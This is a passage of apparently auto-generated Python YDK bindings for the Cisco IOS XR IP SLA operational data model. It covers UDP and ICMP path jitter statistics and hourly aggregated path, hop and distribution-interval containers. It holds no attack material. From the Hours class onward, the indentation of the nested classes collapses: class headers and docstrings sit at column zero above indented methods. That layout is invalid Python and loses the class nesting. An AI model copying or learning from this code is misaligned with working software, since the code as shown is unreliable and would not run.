            ('neg_jitter_max', YLeaf(YType.uint32, 'neg-jitter-max')),
            ('neg_jitter_sum2', YLeaf(YType.uint64, 'neg-jitter-sum2')),
            ('neg_jitter_count', YLeaf(YType.uint32, 'neg-jitter-count')),
        ])
        # All leaf values start unset (None) until populated from the device.
        self.source_address = None
        self.dest_address = None
        self.hop_address = None
        self.packet_interval = None
        self.response_time_count = None
        self.response_time = None
        self.min_response_time = None
        self.max_response_time = None
        self.sum_response_time = None
        self.sum2_response_time = None
        self.packet_count = None
        self.packet_loss_count = None
        self.out_of_sequence_count = None
        self.discarded_sample_count = None
        self.verify_errors_count = None
        self.dropped_error_count = None
        self.jitter = None
        self.pos_jitter_sum = None
        self.pos_jitter_sum2 = None
        self.pos_jitter_min = None
        self.pos_jitter_max = None
        self.pos_jitter_count = None
        self.neg_jitter_sum = None
        self.neg_jitter_min = None
        self.neg_jitter_max = None
        self.neg_jitter_sum2 = None
        self.neg_jitter_count = None
        # Relative data path segment for this container.
        self._segment_path = lambda: "icmp-path-jitter-stats"
    def __setattr__(self, name, value):
        # Validate writes to the registered leafs via YDK's setattr hook.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)
class UdpJitterStats(Entity):
    """
    udp jitter stats
    .. attribute:: jitter_in
    Input Jitter moving average, computed as per RFC1889
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: jitter_out
    Output Jitter moving average, computed as per RFC1889
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: packet_loss_sd
    Packets lost in source to destination (SD) direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: packet_loss_ds
    Packets lost in destination to source (DS) direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: packet_out_of_sequence
    Packets out of sequence
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: packet_mia
    Packets missing in action (cannot determine if theywere lost in SD or DS direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: packet_skipped
    Packets which are skipped
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: packet_late_arrivals
    Packets arriving late
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: packet_invalid_tstamp
    Packets with bad timestamps
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: internal_errors_count
    Number of internal errors
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: busies_count
    Number of busies
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: positive_sd_sum
    Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in SD direction Measured in milliseconds
    **type**\: int
    **range:** 0..4294967295
    **units**\: millisecond
    .. attribute:: positive_sd_sum2
    Sum of squares of positive jitter values in SD direction
    **type**\: int
    **range:** 0..18446744073709551615
    .. attribute:: positive_sd_min
    Minimum of positive jitter values in SD direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: positive_sd_max
    Maximum of positive jitter values in SD direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: positive_sd_count
    Number of positive jitter values in SD direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: negative_sd_sum
    Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in SD direction Measured in milliseconds
    **type**\: int
    **range:** 0..4294967295
    **units**\: millisecond
    .. attribute:: negative_sd_sum2
    Sum of squares of negative jitter values in SD direction
    **type**\: int
    **range:** 0..18446744073709551615
    .. attribute:: negative_sd_min
    Minimum of negative jitter values in SD direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: negative_sd_max
    Maximum of negative jitter values in SD direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: negative_sd_count
    Number of negative jitter values in SD direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: positive_ds_sum
    Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in DS direction Measured in milliseconds
    **type**\: int
    **range:** 0..4294967295
    **units**\: millisecond
    .. attribute:: positive_ds_sum2
    Sum of squares of positive jitter values in DS direction
    **type**\: int
    **range:** 0..18446744073709551615
    .. attribute:: positive_ds_min
    Minimum of positive jitter values in DS direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: positive_ds_max
    Maximum of positive jitter values in DS direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: positive_ds_count
    Number of positive jitter values in DS direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: negative_ds_sum
    Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in DS direction Measured in milliseconds
    **type**\: int
    **range:** 0..4294967295
    **units**\: millisecond
    .. attribute:: negative_ds_sum2
    Sum of squares of negative jitter values in DS direction
    **type**\: int
    **range:** 0..18446744073709551615
    .. attribute:: negative_ds_min
    Minimum of negative jitter values in DS direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: negative_ds_max
    Maximum of negative jitter values in DS direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: negative_ds_count
    Number of negative jitter values in DS direction
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: one_way_count
    Number of probe/probe\-response pairs used to compute one\-way statistics
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: one_way_sd_min
    Minimum of one\-way jitter values in SD direction (msec)
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: one_way_sd_max
    Maximum of one\-way jitter values in SD direction (msec)
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: one_way_sd_sum
    Sum of one\-way jitter values in SD direction (msec)
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: one_way_sd_sum2
    Sum of squares of one\-way jitter values in SD direction (msec)
    **type**\: int
    **range:** 0..18446744073709551615
    .. attribute:: one_way_ds_min
    Minimum of one\-way jitter values in DS direction (msec)
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: one_way_ds_max
    Maximum of one\-way jitter values in DS direction (msec)
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: one_way_ds_sum
    Sum of one\-way jitter values in DS direction (msec)
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: one_way_ds_sum2
    Sum of squares of the OneWayMinDS and OneWayMaxDS values (msec)
    **type**\: int
    **range:** 0..18446744073709551615
    """
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'
    def __init__(self):
        """Register the udp-jitter-stats leafs and initialize them unset."""
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.UdpJitterStats, self).__init__()
        # YANG node name and enclosing container name.
        self.yang_name = "udp-jitter-stats"
        self.yang_parent_name = "specific-stats"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # This container holds only leafs — no child containers or lists.
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Leaf bindings: python attribute -> YLeaf(YANG type, YANG leaf name).
        # Order mirrors the YANG model; sum-of-squares leafs are uint64.
        self._leafs = OrderedDict([
            ('jitter_in', YLeaf(YType.uint32, 'jitter-in')),
            ('jitter_out', YLeaf(YType.uint32, 'jitter-out')),
            ('packet_loss_sd', YLeaf(YType.uint32, 'packet-loss-sd')),
            ('packet_loss_ds', YLeaf(YType.uint32, 'packet-loss-ds')),
            ('packet_out_of_sequence', YLeaf(YType.uint32, 'packet-out-of-sequence')),
            ('packet_mia', YLeaf(YType.uint32, 'packet-mia')),
            ('packet_skipped', YLeaf(YType.uint32, 'packet-skipped')),
            ('packet_late_arrivals', YLeaf(YType.uint32, 'packet-late-arrivals')),
            ('packet_invalid_tstamp', YLeaf(YType.uint32, 'packet-invalid-tstamp')),
            ('internal_errors_count', YLeaf(YType.uint32, 'internal-errors-count')),
            ('busies_count', YLeaf(YType.uint32, 'busies-count')),
            ('positive_sd_sum', YLeaf(YType.uint32, 'positive-sd-sum')),
            ('positive_sd_sum2', YLeaf(YType.uint64, 'positive-sd-sum2')),
            ('positive_sd_min', YLeaf(YType.uint32, 'positive-sd-min')),
            ('positive_sd_max', YLeaf(YType.uint32, 'positive-sd-max')),
            ('positive_sd_count', YLeaf(YType.uint32, 'positive-sd-count')),
            ('negative_sd_sum', YLeaf(YType.uint32, 'negative-sd-sum')),
            ('negative_sd_sum2', YLeaf(YType.uint64, 'negative-sd-sum2')),
            ('negative_sd_min', YLeaf(YType.uint32, 'negative-sd-min')),
            ('negative_sd_max', YLeaf(YType.uint32, 'negative-sd-max')),
            ('negative_sd_count', YLeaf(YType.uint32, 'negative-sd-count')),
            ('positive_ds_sum', YLeaf(YType.uint32, 'positive-ds-sum')),
            ('positive_ds_sum2', YLeaf(YType.uint64, 'positive-ds-sum2')),
            ('positive_ds_min', YLeaf(YType.uint32, 'positive-ds-min')),
            ('positive_ds_max', YLeaf(YType.uint32, 'positive-ds-max')),
            ('positive_ds_count', YLeaf(YType.uint32, 'positive-ds-count')),
            ('negative_ds_sum', YLeaf(YType.uint32, 'negative-ds-sum')),
            ('negative_ds_sum2', YLeaf(YType.uint64, 'negative-ds-sum2')),
            ('negative_ds_min', YLeaf(YType.uint32, 'negative-ds-min')),
            ('negative_ds_max', YLeaf(YType.uint32, 'negative-ds-max')),
            ('negative_ds_count', YLeaf(YType.uint32, 'negative-ds-count')),
            ('one_way_count', YLeaf(YType.uint32, 'one-way-count')),
            ('one_way_sd_min', YLeaf(YType.uint32, 'one-way-sd-min')),
            ('one_way_sd_max', YLeaf(YType.uint32, 'one-way-sd-max')),
            ('one_way_sd_sum', YLeaf(YType.uint32, 'one-way-sd-sum')),
            ('one_way_sd_sum2', YLeaf(YType.uint64, 'one-way-sd-sum2')),
            ('one_way_ds_min', YLeaf(YType.uint32, 'one-way-ds-min')),
            ('one_way_ds_max', YLeaf(YType.uint32, 'one-way-ds-max')),
            ('one_way_ds_sum', YLeaf(YType.uint32, 'one-way-ds-sum')),
            ('one_way_ds_sum2', YLeaf(YType.uint64, 'one-way-ds-sum2')),
        ])
        # All leaf values start unset (None) until populated from the device.
        self.jitter_in = None
        self.jitter_out = None
        self.packet_loss_sd = None
        self.packet_loss_ds = None
        self.packet_out_of_sequence = None
        self.packet_mia = None
        self.packet_skipped = None
        self.packet_late_arrivals = None
        self.packet_invalid_tstamp = None
        self.internal_errors_count = None
        self.busies_count = None
        self.positive_sd_sum = None
        self.positive_sd_sum2 = None
        self.positive_sd_min = None
        self.positive_sd_max = None
        self.positive_sd_count = None
        self.negative_sd_sum = None
        self.negative_sd_sum2 = None
        self.negative_sd_min = None
        self.negative_sd_max = None
        self.negative_sd_count = None
        self.positive_ds_sum = None
        self.positive_ds_sum2 = None
        self.positive_ds_min = None
        self.positive_ds_max = None
        self.positive_ds_count = None
        self.negative_ds_sum = None
        self.negative_ds_sum2 = None
        self.negative_ds_min = None
        self.negative_ds_max = None
        self.negative_ds_count = None
        self.one_way_count = None
        self.one_way_sd_min = None
        self.one_way_sd_max = None
        self.one_way_sd_sum = None
        self.one_way_sd_sum2 = None
        self.one_way_ds_min = None
        self.one_way_ds_max = None
        self.one_way_ds_sum = None
        self.one_way_ds_sum2 = None
        # Relative data path segment for this container.
        self._segment_path = lambda: "udp-jitter-stats"
    def __setattr__(self, name, value):
        # Validate writes to the registered leafs via YDK's setattr hook.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.UdpJitterStats, ['jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds', 'packet_out_of_sequence', 'packet_mia', 'packet_skipped', 'packet_late_arrivals', 'packet_invalid_tstamp', 'internal_errors_count', 'busies_count', 'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min', 'positive_sd_max', 'positive_sd_count', 'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min', 'negative_sd_max', 'negative_sd_count', 'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min', 'positive_ds_max', 'positive_ds_count', 'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min', 'negative_ds_max', 'negative_ds_count', 'one_way_count', 'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum', 'one_way_sd_sum2', 'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum', 'one_way_ds_sum2'], name, value)
class Hours(Entity):
"""
Table of statistics aggregated over 1\-hour
intervals
.. attribute:: hour
Statistics aggregated for a 1\-hour interval
**type**\: list of :py:class:`Hour <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize the hours table container (holds the YANG list 'hour')."""
    super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours, self).__init__()
    # YANG node name and enclosing container name.
    self.yang_name = "hours"
    self.yang_parent_name = "aggregated"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_container_classes = OrderedDict([])
    # Single YANG list child: "hour" -> (python attribute, implementing class).
    self._child_list_classes = OrderedDict([("hour", ("hour", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour))])
    self._leafs = OrderedDict()
    # List entries are collected in a YDK YList bound to this parent.
    self.hour = YList(self)
    # Relative data path segment for this container.
    self._segment_path = lambda: "hours"
def __setattr__(self, name, value):
    """Delegate attribute assignment to YDK's validation hook (no leafs here)."""
    owner = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours
    self._perform_setattr(owner, [], name, value)
class Hour(Entity):
"""
Statistics aggregated for a 1\-hour
interval
.. attribute:: hour_index (key)
Hour Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: distributed
Statistics aggregated on distribution value intervals for in 1\-hour intervals
**type**\: :py:class:`Distributed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed>`
.. attribute:: non_distributed
Statistics aggregated for the total range of values in 1\-hour intervals
**type**\: :py:class:`NonDistributed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize one 1-hour statistics list entry, keyed by hour_index."""
    super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour, self).__init__()
    # YANG node name and enclosing container name.
    self.yang_name = "hour"
    self.yang_parent_name = "hours"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # 'hour_index' is the YANG list key for this entry.
    self.ylist_key_names = ['hour_index']
    # Child containers: YANG name -> (python attribute, implementing class).
    self._child_container_classes = OrderedDict([("distributed", ("distributed", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed)), ("non-distributed", ("non_distributed", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed))])
    self._child_list_classes = OrderedDict([])
    # Leaf bindings: python attribute -> YLeaf(YANG type, YANG leaf name).
    self._leafs = OrderedDict([
        ('hour_index', YLeaf(YType.int32, 'hour-index')),
    ])
    # Key leaf starts unset until assigned.
    self.hour_index = None
    # Eagerly construct both child containers and back-link them to self.
    self.distributed = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed()
    self.distributed.parent = self
    self._children_name_map["distributed"] = "distributed"
    self._children_yang_names.add("distributed")
    self.non_distributed = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed()
    self.non_distributed.parent = self
    self._children_name_map["non_distributed"] = "non-distributed"
    self._children_yang_names.add("non-distributed")
    # Path segment includes the list-key predicate built from hour_index.
    self._segment_path = lambda: "hour" + "[hour-index='" + str(self.hour_index) + "']"
def __setattr__(self, name, value):
    """Validate writes to the 'hour_index' key leaf via YDK's setattr hook."""
    owner = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour
    tracked = ['hour_index']
    self._perform_setattr(owner, tracked, name, value)
class Distributed(Entity):
"""
Statistics aggregated on distribution
value intervals for in 1\-hour intervals
.. attribute:: paths
Table of paths identified in the 1\-hour interval
**type**\: :py:class:`Paths <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths>`
.. attribute:: target
Distribution statistics for the target node
**type**\: :py:class:`Target <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize the distributed statistics container for a 1-hour entry."""
    super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed, self).__init__()
    # YANG node name and enclosing container name.
    self.yang_name = "distributed"
    self.yang_parent_name = "hour"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child containers: YANG name -> (python attribute, implementing class).
    self._child_container_classes = OrderedDict([("paths", ("paths", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths)), ("target", ("target", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target))])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict()
    # Eagerly construct both child containers and back-link them to self.
    self.paths = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths()
    self.paths.parent = self
    self._children_name_map["paths"] = "paths"
    self._children_yang_names.add("paths")
    self.target = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target()
    self.target.parent = self
    self._children_name_map["target"] = "target"
    self._children_yang_names.add("target")
    # Relative data path segment for this container.
    self._segment_path = lambda: "distributed"
class Paths(Entity):
"""
Table of paths identified in the 1\-hour
interval
.. attribute:: path
Paths identified in a 1\-hour interval
**type**\: list of :py:class:`Path <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize the paths table container (holds the YANG list 'path')."""
    super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths, self).__init__()
    # YANG node name and enclosing container name.
    self.yang_name = "paths"
    self.yang_parent_name = "distributed"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_container_classes = OrderedDict([])
    # Single YANG list child: "path" -> (python attribute, implementing class).
    self._child_list_classes = OrderedDict([("path", ("path", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path))])
    self._leafs = OrderedDict()
    # List entries are collected in a YDK YList bound to this parent.
    self.path = YList(self)
    # Relative data path segment for this container.
    self._segment_path = lambda: "paths"
def __setattr__(self, name, value):
    """Delegate attribute assignment to YDK's validation hook (no leafs here)."""
    owner = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths
    self._perform_setattr(owner, [], name, value)
class Path(Entity):
"""
Paths identified in a 1\-hour interval
.. attribute:: path_index (key)
Path Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: hops
Table of hops for a particular path
**type**\: :py:class:`Hops <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize one path list entry, keyed by path_index."""
    super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path, self).__init__()
    # YANG node name and enclosing container name.
    self.yang_name = "path"
    self.yang_parent_name = "paths"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # 'path_index' is the YANG list key for this entry.
    self.ylist_key_names = ['path_index']
    # Child containers: YANG name -> (python attribute, implementing class).
    self._child_container_classes = OrderedDict([("hops", ("hops", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops))])
    self._child_list_classes = OrderedDict([])
    # Leaf bindings: python attribute -> YLeaf(YANG type, YANG leaf name).
    self._leafs = OrderedDict([
        ('path_index', YLeaf(YType.int32, 'path-index')),
    ])
    # Key leaf starts unset until assigned.
    self.path_index = None
    # Eagerly construct the hops child container and back-link it to self.
    self.hops = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops()
    self.hops.parent = self
    self._children_name_map["hops"] = "hops"
    self._children_yang_names.add("hops")
    # Path segment includes the list-key predicate built from path_index.
    self._segment_path = lambda: "path" + "[path-index='" + str(self.path_index) + "']"
def __setattr__(self, name, value):
    """Validate writes to the 'path_index' key leaf via YDK's setattr hook."""
    owner = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path
    tracked = ['path_index']
    self._perform_setattr(owner, tracked, name, value)
class Hops(Entity):
"""
Table of hops for a particular path
.. attribute:: hop
1\-hour aggregated statistics for a hop in a path\-enabled operation
**type**\: list of :py:class:`Hop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize the hops table container (holds the YANG list 'hop')."""
    super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops, self).__init__()
    # YANG node name and enclosing container name.
    self.yang_name = "hops"
    self.yang_parent_name = "path"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_container_classes = OrderedDict([])
    # Single YANG list child: "hop" -> (python attribute, implementing class).
    self._child_list_classes = OrderedDict([("hop", ("hop", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop))])
    self._leafs = OrderedDict()
    # List entries are collected in a YDK YList bound to this parent.
    self.hop = YList(self)
    # Relative data path segment for this container.
    self._segment_path = lambda: "hops"
def __setattr__(self, name, value):
    """Delegate attribute assignment to YDK's validation hook (no leafs here)."""
    owner = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops
    self._perform_setattr(owner, [], name, value)
class Hop(Entity):
"""
1\-hour aggregated statistics for a
hop in a path\-enabled operation
.. attribute:: hop_index (key)
Hop Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: distribution_intervals
Table of distribution intervals for a particular hop
**type**\: :py:class:`DistributionIntervals <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize one hop list entry, keyed by hop_index."""
    super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop, self).__init__()
    # YANG node name and enclosing container name.
    self.yang_name = "hop"
    self.yang_parent_name = "hops"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # 'hop_index' is the YANG list key for this entry.
    self.ylist_key_names = ['hop_index']
    # Child containers: YANG name -> (python attribute, implementing class).
    self._child_container_classes = OrderedDict([("distribution-intervals", ("distribution_intervals", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals))])
    self._child_list_classes = OrderedDict([])
    # Leaf bindings: python attribute -> YLeaf(YANG type, YANG leaf name).
    self._leafs = OrderedDict([
        ('hop_index', YLeaf(YType.int32, 'hop-index')),
    ])
    # Key leaf starts unset until assigned.
    self.hop_index = None
    # Eagerly construct the distribution-intervals child and back-link it.
    self.distribution_intervals = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals()
    self.distribution_intervals.parent = self
    self._children_name_map["distribution_intervals"] = "distribution-intervals"
    self._children_yang_names.add("distribution-intervals")
    # Path segment includes the list-key predicate built from hop_index.
    self._segment_path = lambda: "hop" + "[hop-index='" + str(self.hop_index) + "']"
def __setattr__(self, name, value):
    """Validate writes to the 'hop_index' key leaf via YDK's setattr hook."""
    owner = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop
    tracked = ['hop_index']
    self._perform_setattr(owner, tracked, name, value)
class DistributionIntervals(Entity):
"""
Table of distribution intervals for a particular
hop
.. attribute:: distribution_interval
1\-hour aggregated statistics for a hop in a path\-enabled operation
**type**\: list of :py:class:`DistributionInterval <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize the distribution-intervals table for a particular hop."""
    super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals, self).__init__()
    # YANG node name and enclosing container name.
    self.yang_name = "distribution-intervals"
    self.yang_parent_name = "hop"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_container_classes = OrderedDict([])
    # Single YANG list child: "distribution-interval" -> (attribute, class).
    self._child_list_classes = OrderedDict([("distribution-interval", ("distribution_interval", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval))])
    self._leafs = OrderedDict()
    # List entries are collected in a YDK YList bound to this parent.
    self.distribution_interval = YList(self)
    # Relative data path segment for this container.
    self._segment_path = lambda: "distribution-intervals"
def __setattr__(self, name, value):
    """Delegate attribute assignment to YDK's validation hook (no leafs here)."""
    owner = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals
    self._perform_setattr(owner, [], name, value)
class DistributionInterval(Entity):
"""
1\-hour aggregated statistics for a hop in a
path\-enabled operation
.. attribute:: distribution_index (key)
Distribution Interval
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: common_stats
Common Stats
**type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.CommonStats>`
.. attribute:: specific_stats
Operation Specific Stats
**type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize one distribution-interval list entry, keyed by distribution_index."""
    super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval, self).__init__()
    # YANG node name and enclosing container name.
    self.yang_name = "distribution-interval"
    self.yang_parent_name = "distribution-intervals"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # 'distribution_index' is the YANG list key for this entry.
    self.ylist_key_names = ['distribution_index']
    # Child containers: YANG name -> (python attribute, implementing class).
    self._child_container_classes = OrderedDict([("common-stats", ("common_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.CommonStats)), ("specific-stats", ("specific_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats))])
    self._child_list_classes = OrderedDict([])
    # Leaf bindings: python attribute -> YLeaf(YANG type, YANG leaf name).
    self._leafs = OrderedDict([
        ('distribution_index', YLeaf(YType.int32, 'distribution-index')),
    ])
    # Key leaf starts unset until assigned.
    self.distribution_index = None
    # Eagerly construct both child containers and back-link them to self.
    self.common_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.CommonStats()
    self.common_stats.parent = self
    self._children_name_map["common_stats"] = "common-stats"
    self._children_yang_names.add("common-stats")
